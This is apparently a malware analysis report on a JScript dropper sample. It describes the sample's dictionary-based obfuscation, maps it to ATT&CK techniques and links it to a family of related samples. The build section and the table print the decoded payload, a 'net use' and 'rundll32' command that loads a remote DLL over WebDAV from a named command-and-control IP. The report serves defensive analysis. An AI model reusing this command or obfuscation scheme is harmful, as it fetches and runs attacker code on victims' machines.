SHA-256:
93c5ae9a1385ed38ad9477d54640c83c3e19530f2762e395e7f771197d38a245Build / RE
- Language: JScript (Windows Script Host) ^[file.txt]
- Obfuscation dialect: Pure-JScript dictionary lookup-table (62 entries, random noise keys, 2,976-character extreme variable-name padding). Object name
suspect(divergence from typical random-noise object names). Assembly engine:Function('return this')()[suspect['key1']+suspect['key2']+...](payload_expr). ^[strings.txt:1] - Payload reconstruction:
cmd /c net use \\94.159.113.86:8888\DavWWWRoot & rundll32 \\94.159.113.86:8888\DavWWWRoot\9643213531477.dll,Entry^[strings.txt:378951] - Anti-analysis: None — no debugger checks, no VM detection, no time-bombs, no connectivity checks, no sandbox gate.
- Code quality: Low — hand-written, verbose, repetitive. No commercial obfuscator signatures.
- Notable: The 2,976-character variable name is the only identifier in the script body before the
suspect=[];dictionary declaration. The dictionary object is namedsuspectrather than a random noise string (first observed naming divergence in the 101-sibling family).
Deploy / ATT&CK
| Tactic | Technique | Evidence |
|---|---|---|
| Execution | T1059.005 (Visual Basic / JScript) | .js file opened by user; WScript engine executes JScript ^[file.txt] |
| Execution | T1218.011 (Rundll32) | rundll32 \\94.159.113.86:8888\DavWWWRoot\9643213531477.dll,Entry ^[strings.txt:378951] |
| Defense Evasion | T1218 (System Binary Proxy Execution) | rundll32 is a signed system binary; remote DLL loaded over WebDAV UNC path ^[strings.txt:378951] |
| Defense Evasion | T1027 (Obfuscated Files or Information) | 62-entry noise-key dictionary + 2,976-char variable-name padding ^[strings.txt:1] |
| Command & Control | T1071.001 (Web Protocols) | WebDAV over HTTP (\\94.159.113.86:8888\DavWWWRoot) ^[strings.txt:378951] |
| Command & Control | T1105 (Ingress Tool Transfer) | net use mounts WebDAV share; rundll32 fetches and loads remote DLL ^[strings.txt:378951] |
Family Context
101st confirmed sibling of the unclassified-js-webdav-dropper family. Shares C2 IP 94.159.113.86:8888 with siblings f2316aaf (87th), f346e80d (88th), 77aff542 (91st), and 86140a690cfd (95th). All five use rundll32 ...,Entry execution rather than regsvr32 /s. This sample is the sixth sibling on .86 and confirms sustained activity on this endpoint.
Divergences from prior siblings:
- Object name
suspectinstead of random noise string (first in family) - 2,976-char variable name (within extreme-padding family but not record-holder)
- No PowerShell wrapper, no
wordpaddecoy, no timeout gate, no batch/polyglot layer — minimal footprint
Static-only analysis; CAPE skipped detonation because file type is ASCII text, not a supported binary class. ^[dynamic-analysis.md]